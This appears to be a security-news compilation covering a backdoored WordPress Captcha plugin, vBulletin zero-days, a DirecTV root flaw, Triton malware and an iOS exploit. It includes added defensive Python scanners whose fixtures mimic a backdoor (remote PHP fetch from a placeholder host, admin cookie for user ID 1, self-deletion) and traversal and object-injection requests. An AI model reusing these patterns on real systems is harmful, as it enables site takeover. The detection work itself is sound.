Hidden Backdoor Discovered In WordPress Captcha Plugin Impacts Over 300,000 Websites

Buying popular plugins with a large user base and using them for easy

One such incident occurred recently when the well-known developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, security firm WordFence revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

The plugin was configured to automatically pull an updated "backdoored" version from a remote URL, https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php, after installation from the official WordPress repository, without the site admin's consent.

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.

"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," reads the WordFence blog post. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."

Also, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, so "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.
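The three behaviours WordFence describes (a code fetch from a host outside the wordpress.org repository, an authentication cookie set for a hardcoded user ID 1, and a file that deletes itself) are each individually visible in plugin source. The following scanner is an added example written for this article, not WordFence's tooling or the plugin's own code: it applies those indicators to PHP text and flags a file when two or more co-occur. The trusted-host list, the regexes and both sample files are constructed assumptions; the "backdoored" fixture only mimics the behaviour described in the text so the detector has something to match.

```python
"""Flag WordPress plugin PHP files showing the indicators described above:
off-repository code fetch, hardcoded admin (user ID 1) session, self-deletion.
Added example; heuristics, trusted hosts and sample files are constructed."""
import re
from urllib.parse import urlparse

# Assumption: code/update fetches from these hosts are considered legitimate;
# anything else counts as an off-repository update source.
TRUSTED_UPDATE_HOSTS = ("wordpress.org", "api.wordpress.org", "downloads.wordpress.org")

# Indicator name -> regex. Patterns are loose on whitespace so trivial
# reformatting of the PHP does not evade them.
INDICATORS = [
    ("hardcoded-admin-session",
     re.compile(r"\b(?:wp_set_auth_cookie|wp_set_current_user)\s*\(\s*1\s*[,)]")),
    ("writes-php-file",
     re.compile(r"\bfile_put_contents\s*\([^;]*\.php\b")),
    ("self-deleting",
     re.compile(r"\bunlink\s*\(\s*__FILE__")),
]
# Captures the URL literal handed to common PHP/WordPress fetch functions.
REMOTE_FETCH = re.compile(
    r"\b(?:wp_remote_get|wp_remote_post|file_get_contents|curl_init)"
    r"\s*\(\s*['\"](https?://[^'\"]+)")


def _is_trusted_host(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_UPDATE_HOSTS)


def scan_plugin_source(source: str) -> list[str]:
    """Return the indicator names present in one PHP file (empty list if clean)."""
    findings = [name for name, rx in INDICATORS if rx.search(source)]
    for url in REMOTE_FETCH.findall(source):
        if not _is_trusted_host(url):
            findings.append(f"off-repository-fetch:{urlparse(url).hostname}")
    return findings


def is_suspicious(source: str) -> bool:
    """One indicator alone is common in legitimate plugins; require two or more."""
    return len(scan_plugin_source(source)) >= 2


# Constructed fixture modelled on the article's description (not the real
# plugin's code): off-site fetch, PHP written to disk, user ID 1, self-delete.
BACKDOORED_SAMPLE = """<?php
$resp = wp_remote_get('https://UPDATE-HOST-PLACEHOLDER.example/captcha_pro_update.php');
file_put_contents(__DIR__ . '/inc/update.php', wp_remote_retrieve_body($resp));
wp_set_auth_cookie(1);
@unlink(__FILE__);
"""

# Constructed fixture of ordinary plugin code: update check against
# wordpress.org and a cookie set only for a user that actually authenticated.
BENIGN_SAMPLE = """<?php
$resp = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/sample-captcha.json');
$user = wp_authenticate($_POST['log'], $_POST['pwd']);
if (!is_wp_error($user)) { wp_set_auth_cookie($user->ID); }
"""

if __name__ == "__main__":
    for label, src in (("backdoored", BACKDOORED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, is_suspicious(src), scan_plugin_source(src))
```

In practice you would walk `wp-content/plugins/` and run `scan_plugin_source` over every `.php` file; the two-indicator threshold keeps a plugin that merely checks wordpress.org for updates, or that calls `wp_set_auth_cookie` after a real login, out of the results.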


The reason behind adding a backdoor is unclear at this moment, but when someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind it.

In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthily infect their large user base with malware, spyware, and adware.

While figuring out the exact identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."

Using a reverse whois lookup, the researchers found a number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What's interesting? All of the above-mentioned domains registered under that user contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence has teamed up with WordPress to patch the affected version of the Captcha plugin and blocked the author from publishing updates, so website administrators are strongly recommended to replace their plugin with the latest official Captcha version 4.4.5.

WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit, after 30 days so that admins get enough time to patch their websites.

Two Critical 0-Day Remote Exploits for vBulletin Forum Disclosed Publicly

Security researchers have discovered and disclosed details of two unpatched critical vulnerabilities in a popular internet forum software, vBulletin, one of which could allow a remote attacker to execute malicious code on the latest version of the vBulletin application server.

vBulletin is a widely used proprietary Internet forum software package based on PHP and the MySQL database server. It powers more than 100,000 websites on the Internet, including the websites and forums of Fortune 500 and Alexa Top 1 million companies.

The vulnerabilities were discovered by a security researcher from Italy-based security firm TRUEL IT and an unknown independent security researcher, who disclosed the details of the vulnerabilities through Beyond Security's SecuriTeam Secure Disclosure program.

The vulnerabilities affect version 5 of the vBulletin forum software and are currently unpatched. Beyond Security claims it has tried to contact vBulletin since November 21, 2017, but received no response from the company.

vBulletin Remote Code Execution Vulnerability

The first vulnerability found in vBulletin is a file inclusion issue that leads to remote code execution, allowing a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code.

An unauthenticated attacker can trigger the file inclusion vulnerability by sending a GET request to index.php with the routestring= parameter in the request, eventually allowing the attacker to "create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server."

The researcher has also provided Proof-of-Concept (PoC) exploit code to show the exploitation of the vulnerability. A Common Vulnerabilities and Exposures (CVE) number has not been assigned to this particular vulnerability.

vBulletin Remote Arbitrary File Deletion Vulnerability

The second vulnerability found in the vBulletin forum software version 5 has been assigned CVE-2017-17672 and is described as a deserialization issue that an unauthenticated attacker can exploit to delete arbitrary files and even execute malicious code "under certain circumstances."

The vulnerability is due to unsafe usage of PHP's unserialize() on user-supplied input, which allows an unauthenticated hacker to delete arbitrary files and possibly execute arbitrary code on a vBulletin installation.

A publicly exposed API, the cacheTemplates() function of vB_Library_Template, allows fetching information on a set of given templates from the database and storing them inside a cache variable.
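Both vBulletin issues above come down to an input shape that should never reach the application untouched: a routestring value that names a file path instead of a route, and a PHP-serialized object (the `O:<len>:"Class"` form that unserialize() accepts) in any parameter. The script below is an added example, not code from the researchers or from vBulletin: it parses combined-format access log lines, decodes the query string, and flags requests carrying either shape. The log lines are constructed, the route and parameter names in the third line are placeholders rather than the real vBulletin endpoint, and the regexes are the author's assumptions about what a reasonable first-pass detection looks like.

```python
"""Flag access-log requests carrying the two input shapes discussed above:
path traversal in the vBulletin routestring parameter, and a PHP-serialized
object in any parameter. Added example; log lines and patterns are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format up to the status code, e.g.
# 203.0.113.5 - - [13/Dec/2017:10:00:00 +0000] "GET /index.php?x=y HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# routestring values that look like file paths: dot-dot segments (either
# separator, since the advisory concerns Windows hosts), a drive letter, or NUL.
TRAVERSAL = re.compile(r"\.\.[\\/]|^[A-Za-z]:[\\/]|\x00")

# PHP serialized-object marker O:<length>:"ClassName at the start of a value or
# immediately after a separator, the shape unserialize() turns into an object.
PHP_OBJECT = re.compile(r'(?:^|[;{])O:\d+:"[A-Za-z_\\]')


def inspect_request(target: str) -> list[str]:
    """Return detection names for one request target (path + query)."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; catch double-encoding
            if name == "routestring" and TRAVERSAL.search(value):
                findings.append("routestring-file-inclusion")
            if PHP_OBJECT.search(value):
                findings.append(f"php-object-injection:{name}")
    return findings


def scan_log(lines) -> list[tuple[str, str, list[str]]]:
    """Yield (client ip, target, findings) for every parseable line that triggers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line
        findings = inspect_request(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample log. Line 2 carries a traversal routestring with a
# placeholder file name; line 3 carries a harmless stdClass object in a
# placeholder parameter. Neither is the real vBulletin exploit request.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2017:10:00:00 +0000] "GET /index.php?routestring=forum/general-discussion HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Dec/2017:10:00:03 +0000] "GET /index.php?routestring=..%2F..%2F..%2FPATH-PLACEHOLDER HTTP/1.1" 200 900',
    '198.51.100.7 - - [13/Dec/2017:10:00:09 +0000] "GET /index.php?routestring=ajax/api/ROUTE-PLACEHOLDER&tpl=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 300',
    'not a log line at all',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

Two design points. The checks run on the decoded value, so `%2F` and `..%5C` variants are caught rather than only literal `../`; and the object-marker check is applied to every parameter, not just one endpoint, because the vulnerable code path (here cacheTemplates()) is reachable through a public API and the same unserialize() pattern tends to recur elsewhere in a code base. On the application side, the mitigation is to stop handing user input to unserialize() at all (use JSON, or on PHP 7+ call `unserialize($s, ['allowed_classes' => false])` so no object can be instantiated from the input).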

Zero-Day Remote ‘Root’ Exploit Disclosed In AT&T DirecTV WVB Devices

Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months.

The problem is with a core component of the Genie DVR system that’s shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who’ve signed up to DirecTV service at risk.

The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers.

DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers’ Genie client boxes (up to 8) that are plugged into their TVs around the home.

Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device’s web server, without requiring any authentication.

When trying to browse to the wireless bridge’s web server on the device, Lawshae was expecting a login page or similar, but instead, he found “a wall of text streaming before [his] eyes.”

Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more.

What’s more worrisome was that the device was accepting his commands remotely, and at the “root” level, meaning Lawshae could have run software, exfiltrated data, encrypted files, and done almost anything he wanted on the Linksys device.

“It literally took 30 seconds of looking at this device to find and verify an unauthenticated, remote root command injection vulnerability. It was at this point that I became pretty frustrated,” Lawshae wrote in an advisory published Wednesday on Trend Micro-owned Zero Day Initiative (ZDI) website.

“The vendors involved here should have had some form of secure development to prevent bugs like this from shipping. More than that, we as security practitioners have failed to affect the changes needed in the industry to prevent these simple yet impactful bugs from reaching unsuspecting consumers.”

Lawshae also provided a video, demonstrating how a quick and straightforward hack let anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device.

TRITON Malware used to shut down plant, industrial systems

Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned.

On Thursday, cybersecurity researchers from FireEye’s Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East.

The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity.

Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec — while it is early days into the investigation — the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage.

Google Researcher Releases iOS Exploit—Could Enable iOS 11 Jailbreak

As promised last week, Google’s Project Zero researcher Ian Beer now publicly disclosed an exploit that works on almost all 64-bit Apple devices running iOS 11.1.2 or earlier, which can be used to build an iOS jailbreak, allowing users to run apps from non-Apple sources.

On Monday morning, Beer shared the details on the exploit, dubbed “tfp0,” which leveraged double-free memory corruption vulnerabilities in the kernel, the core of the operating system.

Here, “tfp0” stands for “task for pid 0” or the kernel task port—which gives users full control over the core of the operating system. The Project Zero researcher responsibly reported these vulnerabilities to Apple in October, which were patched by the company with the release of iOS 11.2 on 2nd December.

While Beer says he has successfully tested his proof of concept exploit on the iPhone 6s and 7, and iPod Touch 6G, he believes that his exploit should work on all 64-bit Apple devices.

Another security researcher confirmed that the exploit released by Beer also works on his Apple TvOS 11.x and TV 4K running iOS 11.1.2.

What’s worse? Since Apple’s iOS mobile operating system and macOS desktop operating system share the same code base, the kernel for macOS is also vulnerable to the bug, according to a report published by Project Zero on Google’s Chromium Blog.

Beer said he has also successfully tested the vulnerability on macOS 10.13, running on a MacBook Air 5.2, which Apple patched in macOS 10.13.1. Earlier versions of the operating systems are still vulnerable to the exploit, which basically grants complete core access to the operating system, and that is really what the jailbreak community requires.

Although we have not heard any news about iOS jailbreaks from the jailbreak community for a very long time, Beer’s exploit could be the basis for a future iOS 11 jailbreak, allowing iPhone and iPad users to install third-party OS customizations via apps that are restricted by Apple.

If an iOS 11.1.2 jailbreak surfaces in the coming days, you can still downgrade to iOS 11.1.2 using iTunes even if you have updated to iOS 11.2, because Apple is still signing that version of the operating system.